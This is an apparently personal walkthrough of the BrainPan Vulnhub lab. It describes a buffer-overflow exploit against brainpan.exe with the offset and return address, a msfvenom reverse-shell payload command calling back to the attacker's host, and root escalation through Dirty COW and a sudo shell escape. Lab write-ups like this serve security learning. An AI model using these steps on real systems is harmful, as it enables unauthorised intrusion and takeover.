BrainPan — Vulnhub Walkthrough

Really my brain got on pan, especially when it increases it’s level. This is part 1, it took 30hrs to do this from scratch at my noob stage of hacking. This was my first buffer overflow machine, and I am here to share my thought process.

ENUMERATION

netdiscover to get the IP. #netdiscover -r 10.0.2.0/24

Then go for a fullport nmap scan

So only two ports are open:

• 9999
• 10000

We got nothing in UDP port can.So I opened 10.0.2.14:10000 on browser and found that there was only an image hosted on server.

So let us do a quick nikto scan

Here we can see a directory disclosure, named /bin/. So in browser we traverse to 10.0.2.14:10000/bin/, and we find an exe file named brainpan. When I tested it, this was a 32-bit portable executable. It’s clear it’s gonna be buffer overflow.

So let’s start by downloading it. Shift this to your windows machine, this may be your base machine or other Vbox. I am using this on base machine, though it’s risky.

EXPLOITATION

Running brainpan.exe

Then I ran immunity debugger and attached this process to it

Then on cmd , type C:\WINDOWS\system32>netstat -anob . /////Take care -b option works only if you run cmd with admin priv, this option is used to show what binary is getting executed on that port

So our windows IP is 192.168.1.6 and port is 9999 for brainpan.exe to get connected. So on kali machine we will use netcat to connect to this. On the same time we see receiving connection on our brainpan.exe. Left side : kali , right side: brainpan.exe.

So we will first check if this is vulnerable or not, for this we will use generic_send_tcp from kali

On kali machine : #locate generic_send_tcp, find the path and change directory to it. Mine is /usr/bin/generic_send_tcp

Make a file stats.spk , you can name it anything.spk

We wrote s_string_variable(“0”); Because when we tried entering anything in password field when we were doing netcat, our brainpan.exe shown, s =[]. This means our buffer name is “s” . Now run the generic_send_tcp

We observer here that first it sent some 5000 bytes of data , then gradually become less and finally died. This shows this param is vulnerable to overflow attack. Now we will do some fuzzing. For this write a script fuzzing.py

And again start brainpan.exe. Then run the script

Before Running Script

After Running Script

Something happens and finally you will see

Output of Fuzzing.py

This is what we needed, i.e. at 900 bytes it crashed our brainpan.exe. So, we will make a payload using metasploit-framework.

pattern_create.rb metasploit-framework payload.

Copy this payload to our next python script — — Offset.py

Offset.py

We run this and found changes in immunity debugger. We see we have overwritten all the registers.

Registers overwritten

Now new EIP is 35724134. Let’s create another payload to check actual buffer size. root@kali:/usr/bin# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 900 -q 35724134

Exact match found at 524.

So now we will overwrite our EIP, with some different value -overwriteEIP.py

Inserting B’s at EIP.

On running this, we see on immunity debugger that we have successfully over written EIP register with B’s and other registers with A’s

EIP written with 42424242 = hex value of BBBB

Now is the time to check for bad characters which we don’t want to come in play , while creating payload. So we use a script for bad char testing, by passing all chars and see which one is treated in different meaning

Badchars.py

Now running this will give us, same output as previous step. But what changes have taken place will be reflected in hex dump of ESP stack. So we will follow ESP in hex dump and compare characters

No bad chars. Nothing replaced by original hex

So we will finally make our payload. To do this first we will find vulnerable least security modules using moana. I did the usual step !moana , but it threw an error Pycommands: error importing module. So I checked the following points.

1) Immunity Debugger

2) Python 2.7.1 (32 bit)

3) And download mona from github : https://github.com/corelan/mona. And add mona.py to : C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands. Re run immunity debugger and run !mona from it to see if mona works, and it does.

Mona instead of Moana

Now load mona modules similarly as above: !mona modules

!mona modules

On running : !mona find -s “\xff\xe4” -m brainpan.exe

I found return address: 0x311712f3

Time to write payload. For this first set the break point at jump instruction

Running the script to find if it hits the jump code at breakpoint.

breakpoint.py

Then on running this you see

breakpoint hit at JMP ESP.

A break point is set up at EIP, same address. Thus we control break point now we can add payload. To make payload we will use msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=1234 EXITFUNC=thread -f c -a x86 -b “\x00”

payload.

part 1 overflow.py

part 2 overflow.py

And run the script. Changes we see here

1. Padding added “\x90”*16 bytes
2. IP address changed to our real target machine, instead of testing windows machine

Keeping your netcat listener on at port 1234. Run the script

Eureka we have got our shell !!!!!

PRIVILEGE ESCALATION

Ok so I enumerated Z: drive and it was whole like a linux drive , but how come seems to be windows? So I inspected , a program WINE was running.

Trial and Error

1. I thought we either need to intrude some information from files in linux in Z: drive
2. (or) I shifted to C: drive and tried windows escalation.

Nothing worked beccause:

1. Files in linux held nothing.
2. C: drive was just a drive which seemed to be of windows, it had not capability of windows commands except some basic cmd commands, but no sensitive files.

So what our developer of this machine want us to do? May be spawn from windows shell to linux shell !! Yes the trick lies here. When I did type checksrv.sh < a file already present in puck home directory> . This was the output

So from here I guessed we could run

1)/usr/bin/wine — — to execute any windows executable

2)/usr/bin/python — — to use python on machine

So an idea hit my mind, why not try sudo in same manner

Sudo -l : it showed file not found …. It was simple sudo is not a command of cmd, nor this is actual windows machine. And any linux command directly being run from here will be of no use, cause it not defined anywhere. So /usr/bin/sudo -l: listed above things.

We could use /usr/bin/sudo /home/anansi/bin/anansi_util , to do something provided by that anansi_util function. So we gave it a try:

This shows we need to provide some action in front of this command

I tried with network, which gave a useless output. But then with proclist, I found an arbitrary behavior. It went to an unknown terminal type. And if we press enter it escapes, but if we not. It allows us to type something. Why not escape it using python utility we found above

You can do priv esc easily after this, which I will show after this method.

Method1:

And see we have escaped windows nonsense, and are free to use as many linux commands as we need. But we see we lose our linux shell arbitrarily. This means there is something running behind, that prevents full access to linux terminal. So I press enter and when I get chance to run command on puck@brainpan, I did enumerate process

plugnplay running

You see there is pluplay.exe running, let’s run it again. And you will see you escaped windows shell. So I started with basic linux enumeration

1. Changing home directories of users : denied
2. Uname -a : linux kernel info

So I found it is vulnerable to dirty cow exploit. So I compiled it using -m32 for x86 arch. And then run it on target machine.

compile dirtycow for 32 bit linux kernel

So the exploit worked. Let’s log in

Eureka !! We have successfully rooted the machine.

access to /etc/shadow

Method 2:

In this, if you used Manual (3rd method listed) in sudo -l , instead of proclist. And instead of /usr/bin/python -c “import pty; pty.spawn(‘/bin/bash’);”

Type : !/bin/sh. You would be the root.